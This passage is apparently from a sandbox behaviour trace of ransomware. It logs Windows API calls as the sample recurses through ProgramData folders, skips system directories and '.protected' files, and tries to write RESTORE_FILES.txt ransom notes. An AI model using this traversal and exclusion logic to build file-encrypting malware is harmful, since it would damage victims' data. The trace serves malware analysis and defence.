hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.167] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\RESTORE_FILES.txt") returned 56 [0093.167] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.167] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.167] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.167] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.167] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\RESTORE_FILES.txt") returned 56 [0093.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\ehome\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.168] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.168] lstrcmpiW (lpString1="Event Viewer", lpString2="Windows") returned -1 [0093.168] lstrcmpiW (lpString1="Event Viewer", lpString2="Program Files") returned -1 [0093.168] lstrcmpiW (lpString1="Event Viewer", lpString2="Program Files (x86)") returned -1 
[0093.168] lstrcmpiW (lpString1="Event Viewer", lpString2="$Recycle.bin") returned 1 [0093.168] lstrcmpiW (lpString1="Event Viewer", lpString2="System Volume Information") returned -1 [0093.168] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer") returned 45 [0093.168] lstrcmpW (lpString1="Event Viewer", lpString2=".") returned 1 [0093.168] lstrcmpW (lpString1="Event Viewer", lpString2="..") returned 1 [0093.169] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\*") returned 47 [0093.169] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.169] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.169] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.169] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.169] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.169] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.169] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\.") returned 47 [0093.169] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.169] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.170] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.170] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.170] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.170] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.170] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.170] wnsprintfW (in: 
pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\..") returned 48 [0093.170] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.170] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.170] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.170] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.170] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.170] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.170] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.170] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.170] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\RESTORE_FILES.txt") returned 63 [0093.170] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.170] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.170] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.170] lstrcmpiW (lpString1="Views", lpString2="Windows") returned -1 [0093.170] lstrcmpiW (lpString1="Views", lpString2="Program Files") returned 1 [0093.170] lstrcmpiW (lpString1="Views", lpString2="Program Files (x86)") returned 1 [0093.170] lstrcmpiW (lpString1="Views", lpString2="$Recycle.bin") returned 1 [0093.170] lstrcmpiW (lpString1="Views", lpString2="System Volume Information") returned 1 [0093.170] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views") returned 51 [0093.170] lstrcmpW (lpString1="Views", lpString2=".") returned 1 [0093.170] lstrcmpW 
(lpString1="Views", lpString2="..") returned 1 [0093.171] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*") returned 53 [0093.171] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.171] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.171] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.171] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.171] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.171] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.171] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\.") returned 53 [0093.171] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.171] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.171] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.171] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.172] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.172] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.172] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.172] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\..") returned 54 [0093.172] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.172] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.172] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.172] lstrcmpiW 
(lpString1="ApplicationViewsRootNode", lpString2="Windows") returned -1 [0093.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="Program Files") returned -1 [0093.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="Program Files (x86)") returned -1 [0093.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="$Recycle.bin") returned 1 [0093.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="System Volume Information") returned -1 [0093.172] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned 76 [0093.172] lstrcmpW (lpString1="ApplicationViewsRootNode", lpString2=".") returned 1 [0093.172] lstrcmpW (lpString1="ApplicationViewsRootNode", lpString2="..") returned 1 [0093.172] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*") returned 78 [0093.172] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.172] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.172] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.172] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.172] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.172] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.172] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\.") returned 78 [0093.172] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.173] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: 
lpFindFileData=0x295ea40) returned 1 [0093.173] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.173] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.173] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.173] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.173] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.173] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\..") returned 79 [0093.173] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.173] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.173] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.173] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\RESTORE_FILES.txt") returned 94 [0093.173] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.173] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.173] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.173] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.173] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\RESTORE_FILES.txt") returned 94 [0093.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\applicationviewsrootnode\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.173] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.173] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.174] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\RESTORE_FILES.txt") returned 69 [0093.174] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.174] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.174] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.174] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.174] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\RESTORE_FILES.txt") returned 69 [0093.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event 
Viewer\\Views\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.175] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.175] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.175] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\RESTORE_FILES.txt") returned 63 [0093.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.176] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.176] lstrcmpiW (lpString1="IdentityCRL", lpString2="Windows") returned -1 [0093.176] lstrcmpiW (lpString1="IdentityCRL", lpString2="Program Files") returned -1 [0093.176] lstrcmpiW (lpString1="IdentityCRL", lpString2="Program Files (x86)") returned -1 [0093.176] lstrcmpiW (lpString1="IdentityCRL", lpString2="$Recycle.bin") returned 1 [0093.176] lstrcmpiW (lpString1="IdentityCRL", lpString2="System Volume Information") returned -1 [0093.176] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned 44 [0093.176] lstrcmpW (lpString1="IdentityCRL", lpString2=".") returned 1 [0093.176] lstrcmpW (lpString1="IdentityCRL", lpString2="..") returned 1 [0093.177] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\IdentityCRL\\*") returned 46 [0093.177] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.177] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.177] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.177] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.177] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.177] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.177] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\.") returned 46 [0093.177] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.177] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.177] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.177] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.177] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.177] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.177] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.177] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\..") returned 47 [0093.177] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.177] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.177] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.177] lstrcmpiW (lpString1="ppcrlconfig.dll.protected", lpString2="Windows") returned -1 [0093.177] lstrcmpiW (lpString1="ppcrlconfig.dll.protected", lpString2="Program Files") returned -1 [0093.177] lstrcmpiW 
(lpString1="ppcrlconfig.dll.protected", lpString2="Program Files (x86)") returned -1 [0093.177] lstrcmpiW (lpString1="ppcrlconfig.dll.protected", lpString2="$Recycle.bin") returned 1 [0093.177] lstrcmpiW (lpString1="ppcrlconfig.dll.protected", lpString2="System Volume Information") returned -1 [0093.177] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.protected") returned 70 [0093.177] StrStrIW (lpFirst="ppcrlconfig.dll.protected", lpSrch=".protected") returned=".protected" [0093.177] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.177] lstrcmpiW (lpString1="ppcrlui.dll.protected", lpString2="Windows") returned -1 [0093.177] lstrcmpiW (lpString1="ppcrlui.dll.protected", lpString2="Program Files") returned -1 [0093.178] lstrcmpiW (lpString1="ppcrlui.dll.protected", lpString2="Program Files (x86)") returned -1 [0093.178] lstrcmpiW (lpString1="ppcrlui.dll.protected", lpString2="$Recycle.bin") returned 1 [0093.178] lstrcmpiW (lpString1="ppcrlui.dll.protected", lpString2="System Volume Information") returned -1 [0093.178] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll.protected") returned 66 [0093.178] StrStrIW (lpFirst="ppcrlui.dll.protected", lpSrch=".protected") returned=".protected" [0093.178] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.178] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.178] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.178] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.178] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.178] lstrcmpiW 
(lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.178] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\RESTORE_FILES.txt") returned 62 [0093.178] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.178] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.178] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.178] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.178] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\RESTORE_FILES.txt") returned 62 [0093.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.178] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.178] lstrcmpiW (lpString1="Media Player", lpString2="Windows") returned -1 [0093.178] lstrcmpiW (lpString1="Media Player", lpString2="Program Files") returned -1 [0093.178] lstrcmpiW (lpString1="Media Player", lpString2="Program Files (x86)") returned -1 [0093.178] lstrcmpiW (lpString1="Media Player", lpString2="$Recycle.bin") returned 1 [0093.178] lstrcmpiW (lpString1="Media Player", lpString2="System Volume Information") returned -1 [0093.178] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player") returned 45 [0093.178] lstrcmpW (lpString1="Media Player", lpString2=".") returned 1 [0093.178] lstrcmpW 
(lpString1="Media Player", lpString2="..") returned 1 [0093.178] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\*") returned 47 [0093.178] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.179] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.179] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.179] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.179] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.179] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.179] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\.") returned 47 [0093.179] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.179] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.179] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.179] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.179] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.179] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.179] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.179] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\..") returned 48 [0093.179] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.179] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.179] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.179] lstrcmpiW (lpString1="RESTORE_FILES.txt", 
lpString2="Windows") returned -1 [0093.179] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.179] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.179] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.179] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.179] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\RESTORE_FILES.txt") returned 63 [0093.179] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.179] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.179] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.179] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.179] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\RESTORE_FILES.txt") returned 63 [0093.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\media player\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.180] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.180] lstrcmpiW (lpString1="MF", lpString2="Windows") returned -1 [0093.180] lstrcmpiW (lpString1="MF", lpString2="Program Files") returned -1 [0093.180] lstrcmpiW (lpString1="MF", lpString2="Program Files (x86)") returned -1 [0093.180] lstrcmpiW (lpString1="MF", lpString2="$Recycle.bin") returned 1 [0093.180] lstrcmpiW (lpString1="MF", lpString2="System Volume 
Information") returned -1 [0093.180] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF") returned 35 [0093.180] lstrcmpW (lpString1="MF", lpString2=".") returned 1 [0093.180] lstrcmpW (lpString1="MF", lpString2="..") returned 1 [0093.180] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*") returned 37 [0093.180] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.180] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.180] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.180] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.180] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.180] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.180] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\.") returned 37 [0093.180] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.180] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.180] lstrcmpiW 